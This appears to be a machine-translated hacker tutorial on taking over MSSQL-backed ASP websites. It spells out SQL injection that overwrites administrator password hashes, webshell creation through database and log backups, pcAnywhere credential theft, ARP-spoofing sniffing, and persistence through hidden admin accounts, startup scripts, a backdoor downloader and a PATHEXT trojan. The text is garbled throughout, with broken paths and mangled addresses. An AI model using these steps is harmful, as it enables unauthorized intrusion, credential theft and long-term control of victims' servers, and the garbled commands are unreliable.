Db_owner Privilege Escalation

This article is purely a summary of personal intrusion and has nothing to do with depth. For the first time I wrote an article, there will inevitably be some mistakes or new ideas. Please kindly advise!

Search for ckl inurl: asp on Baidu and search for it. As long as it is a MSSQL database, it must have the db_owner permission or above. At least I have not seen it yet.
Public, db_owner has all operation rights to the database currently connected. You can execute select, update, delete. create. drop and other commands.
Find a china-level website with the db_owner permission on the information you have searched. view the website and find that it has a mobile network 7.1 forum.
Whois.webhosting.info: I found that there is still a website, which should be a personal host. Through telnet to target 80, I found iis5.0, windows2000!
1. Obtain webshell.
There are two ideas. The first one is to start with the website
First, starting from the brute-force table, I found the user table that represents the stored dynamic network user table, and then the field in the table to find out the Administrator's username and password. The password is md5 encrypted, at www.xmd5.org, I found that the Administrator still has some security awareness, not a weak password. so we are
Db_owner permission, which can be updated. What are you afraid! Directly at the injection point www.tar get.com/list.id=1'{update [user] set password = '49ba59abbe56e057 'where id = 1-where 49ba59abbe56e057 is 123456 md5 encryption. Now, change the front-end administrator password to 123456, in the same way, the password of the background administrator is also changed to 123456, And the login is successful. now we can use the database backup method to obtain webshell.
As we all know, mobile network 7.1 cannot be backed up as in the old method. When webshell is obtained, it will check whether the mdb file is backed up. If not, an error will occur! Upload (you can also use the copy command) on the front-end, write down the address, and back up it to. asp is successful, and the client of ice Fox is connected successfully. Then upload a rare Trojan.
The second is the idea.
Direct differential backup. The method used here is the backup log recently released by swan.
Alter database XXXX set RECOVERY FULL
Backup log XXXX to disk = 'C: sammy' with init
Create table cmd (a image)
Insert into cmd (a) values ('')
Backup log XXXX to disk = 'C: xxx2.asp'
XXXX indicates an additional % of the database, which is used for fault tolerance.
Use this method to get a webshell
Now, of course we are looking for a vulnerability to improve permissions. Of course we are considering serv-u and pcanywhere. We can see traces of pcanywhere in the System Service list. In the address bar, enter C: parameters and SettingsAll UsersApplication DataSymantecpcAnywhere can be obtained smoothly. for the cif file, use pcanywhere passview to get the user name and password. If you use pcanywhere to log on, you must only log on to the administrators group. Now you can find a self-starting service program, A rising star is found in the system service list, and the path D: PROGRAM upload is uploaded. wait for the server to restart. I am patient. there are a variety of methods for Elevation of Privilege. Let's do it by yourself.

2. Internet Security
I have read many articles about ARP spoofing recently, so I will try it out. ping www.target.com to get IP1.1.1.2, scan 1.1.1.0-1.1.1.255 through portready, and use ms05039, which is popular in the past, to get a host 1.1.1.3 and enable 3389, download the winpcap Driver (the driver on which the sniffer depends), then download an arpspoof (sniffer), and tracert finds that the gateway is 1.1.1.1. let me talk about the principle of ARP spoofing. ARP is the address parsing protocol, which is the protocol for converting the OSI network layer (IP layer) to the data link layer (MAC, in a LAN, communication is not an IP address, but a physical address, that is, MAC. then we can perform evil spoofing behaviors, such as three hosts,. B .C, A is your machine, B is what you want to cheat
The host, C is the gateway, then we can send an ARP response to C, say I am B, give C my MAC address, then cheat B, I am the gateway, and give him my MAC
Address, they will misunderstand, and all the data sent to B will flow to A. the CPU of this A will load, may lead to A crash.
I personally think that the active method of protection is to bind the MAC and IP to the solid state.
ARPSPOOF is such a tool. Command Format: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
Run arpspoof 1.1.1.1 1.1.12 1.1.1.3 21 c: log.txt on 1.1.1.3
Wait for the Administrator to log on.
3. Stick to bots
If you have worked hard, you must be well protected. We can exploit the folder Creation Vulnerability. For example, if there is A folder named A, we can go to cmd
To the current path, enter mkdir .. in this way, a folder a... is created .., when the file is opened, it points to the folder, so we can prevent an ASP Trojan inside, and then use netbox to point to the file. This ASP Trojan is the SYSTEM permission. when we access asp "> www.target.com/a./asp get.com/a/ B /asptrojan .we also have system .... so we can use this method to prevent all attacks.
Net user jouanc $123456/add
Net localgroup administrators jouanc $/add Save As 1.vbsand put it in the C: winntsystem32GroupPolicyMachineScriptsStartup directory

Net user jouanc $/del is saved as 2.vbsand stored in C: winntsystem32GroupPolicyMachineScriptsShutdown

Save the following as script. ini and put it in C: winntsystem32GroupPolicyMachineScripts
[Startup]
0 Required line = 1.vbs
0 Parameters =
[Shutdown]
0 Required line = 2.vbs
0 Parameters =

I have another idea, that is, to create a "Download Dongdong vbs from the Internet", which is equivalent to downloader. Download the configured backdoors from our own space.
Then, use bat and if to determine whether to download the webshell, and then run it in goto. After binding the two webshells, put them in startup.
Put a del "our Trojan" bat in shutdown, so that ie can be opened. I have been in some bots. To enable ie, it must be set.
Another trick is to enter set in cmd.
There are two rows.
Path = D: WINNTsystem32; D: WINNT; D: WINNTSystem32Wbem
PATHEXT =. COM;. EXE;. BAT;. CMD;. VBS;. VBE;. JS;. JSE;. WSF;. WSH
You know,. com has the highest priority, so we can put a www.google.com. Note that "www.google.com" is our Trojan and we put it in
D: WINNTsystem32, haha. When the zombie opens ie and enters www.google.com, ie will only find our Trojan first.
Unless he entered the "http://www.google.com"

In fact, there are many methods to protect broilers. I like this method very much. It will not be killed, and it will be able to hold on to broilers.